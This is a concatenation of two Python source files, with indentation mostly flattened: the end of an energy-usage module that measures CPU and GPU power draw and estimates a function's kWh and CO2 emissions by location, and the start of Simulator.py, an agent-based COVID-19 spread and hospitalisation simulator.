baseline_check_seconds = 5
files, multiple_cpus = utils.get_files()
is_nvidia_gpu = utils.valid_gpu()
#print(is_nvidia_gpu)
is_valid_cpu = utils.valid_cpu()
#print(is_valid_cpu)
# GPU handling if Nvidia
gpu_baseline =[0]
gpu_process = [0]
bash_command = "nvidia-smi -i 0 --format=csv,noheader --query-gpu=power.draw"#获取gpu的当前功耗
time_baseline = []
reading_baseline_wattage = []
time_process = []
reading_process_wattage = []
    # ---------------- Average wattage of the machine before the process runs (baseline) ----------------
for i in range(int(baseline_check_seconds / DELAY)):
if is_nvidia_gpu:
output = subprocess.check_output(['bash','-c', bash_command])
output = float(output.decode("utf-8")[:-2])
gpu_baseline.append(output)
#print(gpu_baseline)
if is_valid_cpu:
files = utils.measure_files(files, DELAY)
files = utils.update_files(files)
else:
time.sleep(DELAY)
# Adds the most recent value of GPU; 0 if not Nvidia
#print(gpu_baseline[-1])
last_reading = utils.get_total(files, multiple_cpus) + gpu_baseline[-1]
if last_reading >=0 and printToScreen:
utils.log("Baseline wattage", last_reading)
        elapsed = round(i * DELAY, 1)  # renamed so the time module is not shadowed
        time_baseline.append(elapsed)
reading_baseline_wattage.append(last_reading)
if timeseries:
with open('baseline_wattage.csv', 'w') as baseline_wattage_file:
baseline_wattage_writer = csv.writer(baseline_wattage_file)
baseline_wattage_writer.writerow(["time", "baseline wattage reading"])
for i in range(len(time_baseline)):
baseline_wattage_writer.writerow([time_baseline[i], reading_baseline_wattage[i]])
if printToScreen:
utils.newline()
# -----------------------------------Running the process and measuring wattage----------------
q = Queue()
p = Process(target = func, args = (user_func, q, *args,))
start = timer()
small_delay_counter = 0
return_value = None
p.start()
#q.get()
while(p.is_alive()):
# Checking at a faster rate for quick processes
        if small_delay_counter < 10:
            delay = DELAY / 10
            small_delay_counter += 1
        else:
            delay = DELAY
if is_nvidia_gpu:
output = subprocess.check_output(['bash','-c', bash_command])
output = float(output.decode("utf-8")[:-2])
gpu_process.append(output)
if is_valid_cpu:
files = utils.measure_files(files, delay)
files = utils.update_files(files, True)
else:
time.sleep(delay)
# Just output, not added
last_reading = (utils.get_total(files, multiple_cpus) + gpu_process[-1]) / powerLoss
if last_reading >=0 and printToScreen:
utils.log("Process wattage", last_reading)
#print(p.is_alive())
        elapsed = round(timer() - start, 1)  # renamed so the time module is not shadowed
        time_process.append(elapsed)
reading_process_wattage.append(last_reading)
# Getting the return value of the user's function
try:
return_value = q.get_nowait()
print(return_value)
break
except queue.Empty:
pass
p.join()
end = timer()
#print("end!")
if timeseries:
with open('process_wattage.csv', 'w') as process_wattage_file:
process_wattage_writer = csv.writer(process_wattage_file)
process_wattage_writer.writerow(["time", "process wattage reading"])
for i in range(len(time_process)):
process_wattage_writer.writerow([time_process[i], reading_process_wattage[i]])
for file in files:
file.process = file.process[1:-1]
file.baseline = file.baseline[1:-1]
if is_nvidia_gpu:
gpu_baseline_average = statistics.mean(gpu_baseline[2:-1])
gpu_process_average = statistics.mean(gpu_process[2:-1])
else:
gpu_baseline_average = 0
gpu_process_average = 0
total_time = end-start # seconds
# Formatting the time nicely
timedelta = str(datetime.timedelta(seconds=total_time)).split('.')[0]
if files[0].process == []:
raise Exception("Process executed too fast to gather energy consumption")
files = utils.average_files(files)
process_average = utils.get_process_average(files, multiple_cpus, gpu_process_average)
baseline_average = utils.get_baseline_average(files, multiple_cpus, gpu_baseline_average)
difference_average = process_average - baseline_average
watt_averages = [baseline_average, process_average, difference_average, timedelta]
# Subtracting baseline wattage to get more accurate result
process_kwh = convert.to_kwh((process_average - baseline_average)*total_time) / powerLoss
if is_nvidia_gpu:
gpu_file = RAPLFile("GPU", "")
gpu_file.create_gpu(gpu_baseline_average, gpu_process_average)
files.append(RAPLFile("GPU", ""))
# Logging
if printToScreen:
utils.log("Final Readings", baseline_average, process_average, difference_average, timedelta)
return (process_kwh, return_value, watt_averages, files, total_time, time_baseline, reading_baseline_wattage, time_process, reading_process_wattage)
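# A minimal worked example of the energy arithmetic above, assuming
# convert.to_kwh() converts joules (watt-seconds) to kWh. Illustrative only.
def _process_kwh_sketch(process_avg_watts, baseline_avg_watts, seconds, power_loss=0.8):
    joules = (process_avg_watts - baseline_avg_watts) * seconds  # net energy drawn by the process
    kwh = joules / 3.6e6                                         # 1 kWh = 3,600,000 J
    return kwh / power_loss                                      # account for PSU efficiency
# Example: 30 W above baseline for 600 s at 80% PSU efficiency
# _process_kwh_sketch(80, 50, 600) -> 0.00625 kWh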
def energy_mix(location, year = "2016"):
    """ Gets the energy mix information for a specific location
    Parameters:
        location (str): user's location; unknown locations default to the
        United States average
        year (str): year of the dataset to use
    Returns:
        breakdown (list): percentages of each energy type
    """
if location == "Unknown":
location = "United States"
if locate.in_US(location):
# Default to U.S. average for unknown location
data = utils.get_data("data/json/energy-mix-us_" + year + ".json")
s = data[location]['mix'] # get state
coal, oil, gas = s['coal'], s['oil'], s['gas']
nuclear, hydro, biomass, wind, solar, geo, = \
s['nuclear'], s['hydro'], s['biomass'], s['wind'], \
s['solar'], s['geothermal']
low_carbon = sum([nuclear,hydro,biomass,wind,solar,geo])
breakdown = [coal, oil, gas, low_carbon]
return breakdown # list of % of each
else:
data = utils.get_data("data/json/energy-mix-intl_" + year + ".json")
c = data[location] # get country
total, breakdown = c['total'], [c['coal'], c['petroleum'], \
c['naturalGas'], c['lowCarbon']]
# Get percentages
breakdown = list(map(lambda x: 100*x/total, breakdown))
return breakdown # list of % of each
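# A small worked example of the normalisation above: raw energy-mix figures are
# converted to percentages of the total before being returned. Numbers are made up.
def _energy_mix_percent_sketch():
    total = 400.0
    breakdown = [120.0, 40.0, 140.0, 100.0]                 # coal, petroleum, natural gas, low carbon
    return [round(100 * x / total, 1) for x in breakdown]   # -> [30.0, 10.0, 35.0, 25.0]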
def emissions(process_kwh, breakdown, location, year, printToScreen):
""" Calculates the CO2 emitted by the program based on the location
Parameters:
process_kwh (int): kWhs used by the process
breakdown (list): energy mix corresponding to user's location
location (str): location of user
Returns:
emission (float): kilograms of CO2 emitted
state_emission (float): lbs CO2 per MWh; 0 if international location
"""
if process_kwh < 0:
raise OSError("Process wattage lower than baseline wattage. Do not run other processes"
" during the evaluation, or try evaluating a more resource-intensive process.")
if printToScreen:
utils.log("Energy Data", breakdown, location)
state_emission = 0
# Case 1: Unknown location, default to US data
if location == "Unknown":
location = "United States"
# Case 2: United States location
if locate.in_US(location):
# US Emissions data is in lbs/Mwh
data = utils.get_data("data/json/us-emissions_" + year + ".json")
state_emission = data[location]
emission = convert.lbs_to_kgs(state_emission*convert.to_MWh(process_kwh))
# Case 3: International location
else:
# Breaking down energy mix
coal, petroleum, natural_gas, low_carbon = breakdown
breakdown = [convert.coal_to_carbon(process_kwh * coal/100),
convert.petroleum_to_carbon(process_kwh * petroleum/100),
convert.natural_gas_to_carbon(process_kwh * natural_gas/100), 0]
emission = sum(breakdown)
if printToScreen:
utils.log("Emissions", emission)
return (emission, state_emission)
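# A minimal worked example of the U.S. branch above, assuming convert.to_MWh()
# divides kWh by 1000 and convert.lbs_to_kgs() multiplies by ~0.4536. Illustrative only.
def _us_emissions_sketch(process_kwh, state_lbs_per_mwh):
    mwh = process_kwh / 1000.0
    lbs_co2 = state_lbs_per_mwh * mwh
    return lbs_co2 * 0.453592  # pounds -> kilograms
# Example: 0.01 kWh in a state emitting 900 lbs CO2/MWh
# _us_emissions_sketch(0.01, 900) -> ~0.0041 kg CO2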
#OLD VERSION: US, EU, Rest comparison
def old_emissions_comparison(process_kwh, year, default_location, printToScreen):
# Calculates emissions in different locations
intl_data = utils.get_data("data/json/energy-mix-intl_" + year + ".json")
global_emissions, europe_emissions, us_emissions = [], [], []
# Handling international
for country in intl_data:
c = intl_data[country]
total, breakdown = c['total'], [c['coal'], c['petroleum'], \
c['naturalGas'], c['lowCarbon']]
if isinstance(total, float) and float(total) > 0:
breakdown = list(map(lambda x: 100*x/total, breakdown))
coal, petroleum, natural_gas, low_carbon = breakdown
breakdown = [convert.coal_to_carbon(process_kwh * coal/100),
convert.petroleum_to_carbon(process_kwh * petroleum/100),
convert.natural_gas_to_carbon(process_kwh * natural_gas/100), 0]
emission = sum(breakdown)
if locate.in_Europe(country):
europe_emissions.append((country,emission))
else:
global_emissions.append((country,emission))
global_emissions.sort(key=lambda x: x[1])
europe_emissions.sort(key=lambda x: x[1])
# Handling US
us_data = utils.get_data("data/json/us-emissions_" + year + ".json")
for state in us_data:
if ((state != "United States") and state != "_units"):
if us_data[state] != "lbs/MWh":
emission = convert.lbs_to_kgs(us_data[state]*convert.to_MWh(process_kwh))
us_emissions.append((state, emission))
us_emissions.sort(key=lambda x: x[1])
max_global, max_europe, max_us = global_emissions[len(global_emissions)-1], \
europe_emissions[len(europe_emissions)-1], us_emissions[len(us_emissions)-1]
median_global, median_europe, median_us = global_emissions[len(global_emissions)//2], \
europe_emissions[len(europe_emissions)//2], us_emissions[len(us_emissions)//2]
min_global, min_europe, min_us= global_emissions[0], europe_emissions[0], us_emissions[0]
if default_location and printToScreen:
utils.log('Emissions Comparison default', max_global, median_global, min_global, max_europe, \
median_europe, min_europe, max_us, median_us, min_us)
default_emissions = [max_global, median_global, min_global, max_europe, \
median_europe, min_europe, max_us, median_us, min_us]
return default_emissions
def emissions_comparison(process_kwh, locations, year, default_location, printToScreen):
# TODO: Disambiguation of states such as Georgia, US and Georgia
intl_data = utils.get_data("data/json/energy-mix-intl_" + year + ".json")
us_data = utils.get_data("data/json/us-emissions_" + year + ".json")
emissions = [] # list of tuples w/ format (location, emission)
for location in locations:
if locate.in_US(location):
emission = convert.lbs_to_kgs(us_data[location]*convert.to_MWh(process_kwh))
emissions.append((location, emission))
else:
c = intl_data[location]
total, breakdown = c['total'], [c['coal'], c['petroleum'], \
c['naturalGas'], c['lowCarbon']]
if isinstance(total, float) and float(total) > 0:
breakdown = list(map(lambda x: 100*x/total, breakdown))
coal, petroleum, natural_gas, low_carbon = breakdown
breakdown = [convert.coal_to_carbon(process_kwh * coal/100),
convert.petroleum_to_carbon(process_kwh * petroleum/100),
convert.natural_gas_to_carbon(process_kwh * natural_gas/100), 0]
emission = sum(breakdown)
emissions.append((location,emission))
if emissions != [] and not default_location and printToScreen:
utils.log('Emissions Comparison', emissions)
return emissions
def get_comparison_data(result, locations, year, printToScreen):
geo = locate.get_location_information()
location = locate.get(printToScreen, geo)
default_location = False
if locations == ["Mongolia", "Iceland", "Switzerland"]:
default_location = True
comparison_values = emissions_comparison(result, locations, year, default_location, printToScreen)
default_emissions = old_emissions_comparison(result, year, default_location, printToScreen)
return (location, default_location, comparison_values, default_emissions)
def png_bar_chart(location, emission, default_emissions):
default_emissions_list = []
for i in range(0, 9):
rounded_default_emission = float(format((default_emissions[i])[1], '.3g'))
default_emissions_list.append(rounded_default_emission)
global_dict = {"Mongolia" : default_emissions_list[0], "South Korea": default_emissions_list[1], "Bhutan" : default_emissions_list[2]}
eu_dict = {"Kosovo" : default_emissions_list[3], "Ukraine" : default_emissions_list[4], "Iceland" : default_emissions_list[5]}
us_dict = {"Wyoming" : default_emissions_list[6], "Mississippi" : default_emissions_list[7], "Vermont" : default_emissions_list[8]}
graph.make_comparison_bar_charts(location, emission, us_dict, eu_dict, global_dict)
def evaluate(user_func, *args, pdf=False, png = False, timeseries=True, powerLoss=0.8, energyOutput=False, \
locations=["Mongolia", "Iceland", "Switzerland"], year="2016", printToScreen = True):
""" Calculates effective emissions of the function
Parameters:
user_func: user's function + associated args
pdf (bool): whether a PDF report should be generated
powerLoss (float): PSU efficiency rating
energyOutput (bool): return value also includes information about energy usage, not just function's return
locations (list of strings): list of locations to be compared
year (str): year of dataset to be used
printToScreen (bool): get information in the command line
"""
try:
utils.setGlobal(printToScreen)
if (utils.valid_cpu() or utils.valid_gpu()):
#print(utils.valid_cpu())
#print(utils.valid_gpu())
result, return_value, watt_averages, files, total_time, time_baseline, reading_baseline_wattage, time_process, reading_process_wattage = energy(user_func, *args, powerLoss = powerLoss, year = year, \
printToScreen = printToScreen, timeseries = timeseries)
"""
location, default_location, comparison_values, default_emissions = get_comparison_data(result, locations, year, printToScreen)
breakdown = energy_mix(location, year = year)
emission, state_emission = emissions(result, breakdown, location, year, printToScreen)
if printToScreen:
utils.log("Assumed Carbon Equivalencies")
"""
if printToScreen:
utils.log("Process Energy", result)
'''
func_info = [user_func.__name__, *args]
kwh_and_emissions = [result, emission, state_emission]
if pdf:
#pass
report.generate(location, watt_averages, breakdown, kwh_and_emissions, \
func_info, comparison_values, default_emissions, default_location)
if png:
# generate energy mix pie chart
energy_dict = {"Coal" : breakdown[0], "Petroleum" : breakdown[1], "Natural Gas" : breakdown[2], "Low Carbon" : breakdown[3]}
figtitle = "Location: " + location
location_split = location.split()
filename = location_split[0]
for i in range(1, len(location_split)):
filename += "_" + location_split[i]
filename += ".png"
if locate.in_US(location):
energy_dict["Oil"] = energy_dict.pop("Petroleum")
figtitle = figtitle + ", USA"
graph.pie_chart(energy_dict, figtitle, filename)
# generate emissions comparison bar charts
png_bar_chart(location, emission, default_emissions)
if timeseries:
graph.timeseries(time_baseline, reading_baseline_wattage, "Baseline Wattage Timeseries")
graph.timeseries(time_process, reading_process_wattage, "Process Wattage Timeseries")
'''
if energyOutput:
return (total_time, result, return_value)
else:
sys.stdout.write("{:<13} {:51} {:>10.2e} \n".format("return_value:", "", return_value))
#return return_value
else:
utils.log("The energy-usage package only works on Linux kernels "
"with Intel processors that support the RAPL interface and/or machines with"
" an Nvidia GPU. Please try again on a different machine.")
except Exception as e:
print("\n" + str(e))
|
Simulator.py
|
from Person import Person as person
from DataPool import DataPool as DataPool
import numpy as np
import math as math
import copy as copy
import random
import threading
from File_handler import File_handler as Writer
class Simulator:
# ---- Constructor ----#
def __init__(self, people, days):
self.writer = Writer("writeData")
self.n = 1000
self.dataPool = DataPool(int(people))
self.dists = 1
        # One [kid, young, adult, total] time-series bucket per district
        self.distAsymp = [[[], [], [], []] for _ in range(self.dists)]
        self.distSymp = [[[], [], [], []] for _ in range(self.dists)]
        self.distAdmitted = [[[], [], [], []] for _ in range(self.dists)]
        self.distCured = [[[], [], [], []] for _ in range(self.dists)]
        self.distRecovered = [[[], [], [], []] for _ in range(self.dists)]
        self.distICU = [[[], [], [], []] for _ in range(self.dists)]
        self.distVen = [[[], [], [], []] for _ in range(self.dists)]
        self.distDead = [[[], [], [], []] for _ in range(self.dists)]
        self.distIntInfect = [[[], [], [], []] for _ in range(self.dists)]
        self.distNonintInfect = [[[], [], [], []] for _ in range(self.dists)]
self.pr = person()
self.people = []
self.curedKid = []
self.curedYoung = []
self.curedAdult = []
self.recoveredKid = []
self.recoveredYoung = []
self.recoveredAdult = []
self.intInfectKid = []
self.intInfectYoung = []
self.intInfectAdult = []
self.nonintInfectKid = []
self.nonintInfectYoung = []
self.nonintInfectAdult = []
self.asympKid = []
self.asympYoung = []
self.asympAdult = []
self.admittedKid = []
self.admittedYoung = []
self.admittedAdult = []
self.ICUKid = []
self.ICUYoung = []
self.ICUAdult = []
self.VenKid = []
self.VenYoung = []
self.VenAdult = []
self.deadKid = []
self.deadYoung = []
self.deadAdult = []
self.sympYoung = []
self.sympKid = []
self.sympAdult = []
self.dayAdult = 1
self.toICU = 0.11 # increased for now
self.toVen = 0.88
self.records = int(people)
self.toDie = 0.11
self.asympKidNum = []
self.asympYoungNum = []
self.asympAdultNum = []
self.admittedKidNum = []
self.admittedYoungNum = []
self.admittedAdultNum = []
self.ICUKidNum = []
self.ICUYoungNum = []
self.ICUAdultNum = []
self.VenKidNum = []
self.VenYoungNum = []
self.VenAdultNum = []
self.sympYoungNum = []
self.sympKidNum = []
self.sympAdultNum = []
self.deadYoungNum = []
self.deadKidNum = []
self.deadAdultNum = []
self.curedYoungNum = []
self.curedKidNum = []
self.recoveredAdultNum = []
self.recoveredYoungNum = []
self.recoveredKidNum = []
self.intInfectKidNum = []
self.intInfectYoungNum = []
self.intInfectAdultNum = []
self.nonintInfectKidNum = []
self.nonintInfectYoungNum = []
self.nonintInfectAdultNum = []
self.curedAdultNum = []
self.asympNum = []
self.sympNum = []
self.admittedNum = []
self.venNum = []
self.ICUNum = []
self.deadNum = []
self.curedNum = []
self.recoveredNum = []
self.intInfectNum = []
self.nonintInfectNum = []
self.days = int(days)
self.determiner = [[2.774, 0.899], [2.883, 0.856], [2.599, 0.844]]
self.immune_days = 0
self.mask_dist_percent = 0
self.close_circle = 0
# ---- Constructor declared ----#
# ---- Function to count Intervention-Infected patient ----#
def intInfect(self, id):
if self.people[id].age < 5:
self.intInfectKid.append(id)
elif self.people[id].age > 59:
self.intInfectAdult.append(id)
else:
self.intInfectYoung.append(id)
# ---- Completed function definition of intInfect() ----#
# ---- Function to count Non-Intervention-Infected patient ----#
def nonintInfect(self, id):
if self.people[id].age < 5:
self.nonintInfectKid.append(id)
elif self.people[id].age > 59:
self.nonintInfectAdult.append(id)
else:
self.nonintInfectYoung.append(id)
# ---- Completed function definition of nonintInfect() ----#
# ---- Function to Recover the patient ----#
def recovered(self, id):
if self.people[id].age < 5:
self.recoveredKid.append(id)
elif self.people[id].age > 59:
self.recoveredAdult.append(id)
else:
self.recoveredYoung.append(id)
# ---- Completed function definition of recovered() ----#
# ---- Function to Cure the patient ----#
def cured(self, id):
if self.people[id].age < 5:
self.curedKid.append(id)
elif self.people[id].age > 59:
self.curedAdult.append(id)
else:
self.curedYoung.append(id)
# ---- Completed function definition of cured() ----#
# ---- Function to Admit the patient ----#
def admit(self, id):
if self.people[id].age < 5:
self.admittedKid.append(id)
elif self.people[id].age > 59:
self.admittedAdult.append(id)
else:
self.admittedYoung.append(id) # May Erase
# ---- Completed function definition of admit() ----#
    # ---- Function to mark the patient as having symptomatic covid-19 ----#
def symp(self, id):
if self.people[id].age < 5:
self.sympKid.append(id)
elif self.people[id].age > 59:
self.sympAdult.append(id)
else:
self.sympYoung.append(id)
# ---- Completed function definition of symp() ----#
    # ---- Function to mark the patient as having asymptomatic covid-19 ----#
def asymp(self, id):
if self.people[id].age < 5:
self.asympKid.append(id)
elif self.people[id].age > 59:
self.asympAdult.append(id)
else:
self.asympYoung.append(id)
# ---- Completed function definition of asymp() ----#
# ---- Function to get the patient into the ventilator----#
def ven(self, id):
if self.people[id].age < 5:
self.VenKid.append(id)
elif self.people[id].age > 59:
self.VenAdult.append(id)
else:
self.VenYoung.append(id)
# ---- Completed function definition of ven() ----#
# ---- Function to get the patient into the ICU----#
def ICU(self, id):
if self.people[id].age < 5:
self.ICUKid.append(id)
elif self.people[id].age > 59:
self.ICUAdult.append(id)
else:
self.ICUYoung.append(id)
# ---- Completed function definition of ICU() ----#
    # ---- This function returns whether the required element is in the list ----#
    def exists(self, lis, val):
        for i in range(len(lis)):
            if lis[i] == val:  # compare by value, not identity
                return True
        return False
    # ---- Completed function definition of exists() ----#
# ---- Function to set the number of contacts for everyone ----#
def setcontacts(self, id):
# if self.people[id].age < 5:
# val = 0
# elif self.people[id].age > 59:
# val = 2
# else:
# val = 1
# print(type(self.people[id]), self.people[id])
        numlist = self.dataPool.getNum(self.people[id]) / 10
        # print("Contact: " + str(numlist))
        # int(numlist) can never be None, so no retry loop is needed
        self.people[id].contacts = int(numlist)  # MODIFIED
# ---- This function sets the closest[] to the person whose id is passed ----#
def setclosest(self, id):
lat1 = 15
lat2 = 20
long1 = 77
long2 = 82
farthest = math.hypot(lat2 - lat1, long1 - long2)
size = len(self.people)
for i in range(id, size):
if len(self.people[id].closest) >= self.people[id].contacts:
return
if len(self.people[i].closest) >= self.people[i].contacts:
continue
if id != i:
dist = math.hypot(self.people[id].lat - self.people[i].lat, self.people[id].long - self.people[i].long)
meet = random.choices([1, 0], weights=(1 - (dist / farthest), dist / farthest), k=1)
                if meet[0] == 1:
if not self.exists(self.people[id].closest, i):
self.people[id].closest.append(i)
self.people[i].closest.append(id)
# self.writer.log(" The closest of "+str(id)+" is "+str(self.people[id].closest))
# ---- Completed function definition of setClosest() ----#
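    # A minimal sketch of the distance-weighted contact rule used in setclosest():
    # the chance of two people meeting falls linearly from 1 (same spot) to 0
    # (opposite corners of the simulated lat/long box). Coordinates are made up.
    def _meeting_probability_sketch(self, lat_a, long_a, lat_b, long_b):
        import math
        farthest = math.hypot(20 - 15, 82 - 77)            # diagonal of the simulated region
        dist = math.hypot(lat_a - lat_b, long_a - long_b)
        return 1 - (dist / farthest)                        # weight fed to random.choices([1, 0], ...)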
# ---- This function gets the person to meet up with all the people who have come in contact ----#
def coronaSpree(self, id):
size = len(self.people[id].closest)
weight = []
j = int(0)
if self.people[id].isInfected():
if self.presentday <= 68:
size = size * 0.41
self.close_circle = 0.85
self.mask_dist_percent = 0
elif (self.presentday <= 129) and (self.presentday > 68):
size = size * 0.54
self.close_circle = 0.8
elif (self.presentday <= 142) and (self.presentday > 129):
size = size * 0.67
self.close_circle = 0.75
else:
size = size * 1
self.close_circle = 0.63
for i in range(int(size)): # MODIFIED Might need numerical correction
if i < self.close_circle * (int(size)):
chance = random.randint(3, 10)
j = int(i)
if id > self.people[id].closest[j]:
continue
if not self.people[self.people[id].closest[j]].isHealthy(): # MODIFIED
continue
per = self.people[id].closest[j]
else:
rand = random.randint(0, len(self.people) - 1)
chance = random.randint(1, 5)
if id > rand:
continue
if self.exists(self.people[id].closest, rand):
i = i - 1
continue
if not self.people[rand].isHealthy(): # MODIFIED
continue
else:
per = rand
mask = 0
mask = random.choices([1, 0], weights=(self.mask_dist_percent, 100 - self.mask_dist_percent), k=1)
if mask[0] == 1:
mask_effectiveness = 14.3 # mask effectiveness in percent
chance = chance * ((100 - mask_effectiveness) / 100)
distancing_effectiveness = 10.2 # distancing effectiveness in percent
chance = chance * ((100 - distancing_effectiveness) / 100)
st = random.choices([1, 0], weights=(chance, 100 - chance), k=1) # chance that corona has spread
            if st[0] == 1:  # If corona has spread through intervention or not
if int(mask[0]) > 0:
self.intInfect(per)
else:
self.nonintInfect(per)
            if st[0] == 1:  # If corona has spread
if (self.people[per].age < 5):
chance = 0.8
elif (self.people[per].age > 59):
chance = 0.8
else:
chance = 0.8
else: # If corona has not spread
continue
st = random.choices([1, 0], weights=(chance, 1 - chance), k=1) # Odds that the affected is asymptomatic
            if st[0] == 1:  # if asymptomatic
self.people[per].setStatus("Asymptamatic")
lim = 5 + int(14)
# if self.people[per].age < 5: # incubation period
# lim = lim + int(3)
# elif self.people[per].age > 59:
# lim = lim + int(5)
# else:
# lim = lim + int(14)
self.people[per].setLimit(lim)
self.asymp(per)
else: # if symptomatic
self.people[per].setStatus("Symptamatic")
lim = 5 + int(5)
# if self.people[per].age < 5: # incubation period
# lim = lim + int(3)
# elif self.people[per].age > 59:
# lim = lim + int(5)
# else:
# lim = lim + int(14)
self.people[per].setLimit(lim)
self.symp(per)
return
# ---- Completed function definition of coronaSpree() ----#
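    # A small worked example of how the mask and distancing effectiveness figures
    # above combine: each intervention scales the base transmission chance
    # multiplicatively. A minimal sketch; whether both always apply together
    # depends on how mask_dist_percent is interpreted.
    def _intervention_chance_sketch(self, base_chance, follows_interventions):
        chance = base_chance
        if follows_interventions:
            chance *= (100 - 14.3) / 100   # mask effectiveness, percent
            chance *= (100 - 10.2) / 100   # distancing effectiveness, percent
        return chance                      # e.g. base 10 -> ~7.70 when followed, 10 otherwise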
    # ---- Function that updates status once the limit is reached ----#
def update(self):
size = len(self.sympKid)
for i in range(size):
if i >= size:
break
if self.people[self.sympKid[i]].reachedLimit():
self.people[self.sympKid[i]].setLimit(14)
self.people[self.sympKid[i]].setStatus("Admitted")
self.admit(self.sympKid[i])
l = self.sympKid.pop(i)
size = size - 1
size = len(self.sympYoung)
for i in range(size):
if i >= size:
break
if self.people[self.sympYoung[i]].reachedLimit():
self.people[self.sympYoung[i]].setLimit(14)
self.people[self.sympYoung[i]].setStatus("Admitted")
self.admit(self.sympYoung[i])
l = self.sympYoung.pop(i)
size = size - 1
size = len(self.sympAdult)
for i in range(size):
if i >= size:
break
if self.people[self.sympAdult[i]].reachedLimit():
self.people[self.sympAdult[i]].setLimit(14)
self.people[self.sympAdult[i]].setStatus("Admitted")
self.admit(self.sympAdult[i])
l = self.sympAdult.pop(i)
size = size - 1
size = len(self.asympKid)
for i in range(size):
if i >= size:
break
if self.people[self.asympKid[i]].reachedLimit():
self.people[self.asympKid[i]].setLimit(self.immune_days)
self.people[self.asympKid[i]].setStatus("Cured")
self.cured(self.asympKid[i])
self.recovered(self.asympKid[i])
l = self.asympKid.pop(i)
size = size - 1
size = len(self.asympYoung)
for i in range(size):
if i >= size:
break
if self.people[self.asympYoung[i]].reachedLimit():
self.people[self.asympYoung[i]].setLimit(self.immune_days)
self.people[self.asympYoung[i]].setStatus("Cured")
self.cured(self.asympYoung[i])
self.recovered(self.asympYoung[i])
l = self.asympYoung.pop(i)
size = size - 1
size = len(self.asympAdult)
for i in range(size):
if i >= size:
break
if self.people[self.asympAdult[i]].reachedLimit():
self.people[self.asympAdult[i]].setLimit(self.immune_days)
self.people[self.asympAdult[i]].setStatus("Cured")
self.cured(self.asympAdult[i])
self.recovered(self.asympAdult[i])
l = self.asympAdult.pop(i)
size = size - 1
size = len(self.admittedKid)
for i in range(size):
if i >= size:
break
if self.people[self.admittedKid[i]].reachedLimit():
st = random.choices([1, 0], weights=(self.toICU, 1 - self.toICU), k=1)
if st[0] == 1:
lim_ = random.triangular(7, 8, 9)
lim = int(lim_)
self.people[self.admittedKid[i]].setStatus("ICU")
self.people[self.admittedKid[i]].setLimit(lim)
self.ICU(self.admittedKid[i])
l = self.admittedKid.pop(i)
size = size - 1
else:
self.people[self.admittedKid[i]].setLimit(self.immune_days)
self.people[self.admittedKid[i]].setStatus("Cured")
self.cured(self.admittedKid[i])
self.recovered(self.admittedKid[i])
l = self.admittedKid.pop(i)
size = size - 1
size = len(self.admittedYoung)
for i in range(size):
if i >= size:
break
if self.people[self.admittedYoung[i]].reachedLimit():
st = random.choices([1, 0], weights=(self.toICU, 1 - self.toICU), k=1)
if st[0] == 1:
lim_ = random.triangular(7, 8, 9)
lim = int(lim_)
self.people[self.admittedYoung[i]].setStatus("ICU")
self.people[self.admittedYoung[i]].setLimit(lim)
self.ICU(self.admittedYoung[i])
l = self.admittedYoung.pop(i)
size = size - 1
else:
self.people[self.admittedYoung[i]].setLimit(self.immune_days)
self.people[self.admittedYoung[i]].setStatus("Cured")
self.cured(self.admittedYoung[i])
self.recovered(self.admittedYoung[i])
l = self.admittedYoung.pop(i)
size = size - 1
size = len(self.admittedAdult)
for i in range(size):
if i >= size:
break
if self.people[self.admittedAdult[i]].reachedLimit():
st = random.choices([1, 0], weights=(self.toICU, 1 - self.toICU), k=1)
if st[0] == 1:
lim_ = random.triangular(7, 8, 9)
lim = int(lim_)
self.people[self.admittedAdult[i]].setStatus("ICU")
self.people[self.admittedAdult[i]].setLimit(lim)
self.ICU(self.admittedAdult[i])
l = self.admittedAdult.pop(i)
size = size - 1
else:
self.people[self.admittedAdult[i]].setLimit(self.immune_days)
self.people[self.admittedAdult[i]].setStatus("Cured")
self.cured(self.admittedAdult[i])
self.recovered(self.admittedAdult[i])
l = self.admittedAdult.pop(i)
size = size - 1
size = len(self.ICUKid)
for i in range(size):
if i >= size:
break
if self.people[self.ICUKid[i]].reachedLimit():
st = random.choices([1, 0], weights=(self.toVen, 1 - self.toVen), k=1)
if st[0] == 1:
lim_ = random.triangular(5, 7, 12)
lim = int(lim_)
self.people[self.ICUKid[i]].setLimit(lim)
self.people[self.ICUKid[i]].setStatus("Ventilator")
self.ven(self.ICUKid[i])
l = self.ICUKid.pop(i)
size = size - 1
else:
self.people[self.ICUKid[i]].setLimit(self.immune_days)
self.people[self.ICUKid[i]].setStatus("Cured")
self.cured(self.ICUKid[i])
self.recovered(self.ICUKid[i])
l = self.ICUKid.pop(i)
size = size - 1
size = len(self.ICUYoung)
for i in range(size):
if i >= size:
break
if self.people[self.ICUYoung[i]].reachedLimit():
st = random.choices([1, 0], weights=(self.toVen, 1 - self.toVen), k=1)
if st[0] == 1:
lim_ = random.triangular(5, 7, 12)
lim = int(lim_)
self.people[self.ICUYoung[i]].setLimit(lim)
self.people[self.ICUYoung[i]].setStatus("Ventilator")
self.ven(self.ICUYoung[i])
l = self.ICUYoung.pop(i)
size = size - 1
else:
self.people[self.ICUYoung[i]].setLimit(self.immune_days)
self.people[self.ICUYoung[i]].setStatus("Cured")
self.cured(self.ICUYoung[i])
self.recovered(self.ICUYoung[i])
l = self.ICUYoung.pop(i)
size = size - 1
size = len(self.ICUAdult)
for i in range(size):
if i >= size:
break
if self.people[self.ICUAdult[i]].reachedLimit():
st = random.choices([1, 0], weights=(self.toVen, 1 - self.toVen), k=1)
if st[0] == 1:
lim_ = random.triangular(5, 7, 12)
lim = int(lim_)
self.people[self.ICUAdult[i]].setLimit(lim)
self.people[self.ICUAdult[i]].setStatus("Ventilator")
self.ven(self.ICUAdult[i])
l = self.ICUAdult.pop(i)
size = size - 1
else:
self.people[self.ICUAdult[i]].setLimit(self.immune_days)
self.people[self.ICUAdult[i]].setStatus("Cured")
self.cured(self.ICUAdult[i])
self.recovered(self.ICUAdult[i])
l = self.ICUAdult.pop(i)
size = size - 1
size = len(self.VenAdult)
for i in range(size):
if i >= size:
break
if self.people[self.VenAdult[i]].reachedLimit():
st = random.choices([1, 0], weights=(self.toDie, 1 - self.toDie), k=1)
if st[0] == 1:
lim_ = random.triangular(5, 7, 12)
lim = int(lim_)
self.people[self.VenAdult[i]].setLimit(lim)
self.people[self.VenAdult[i]].setStatus("Dead")
self.deadAdult.append(self.VenAdult[i])
l = self.VenAdult.pop(i)
size = size - 1
else:
self.people[self.VenAdult[i]].setLimit(self.immune_days)
self.people[self.VenAdult[i]].setStatus("Cured")
self.cured(self.VenAdult[i])
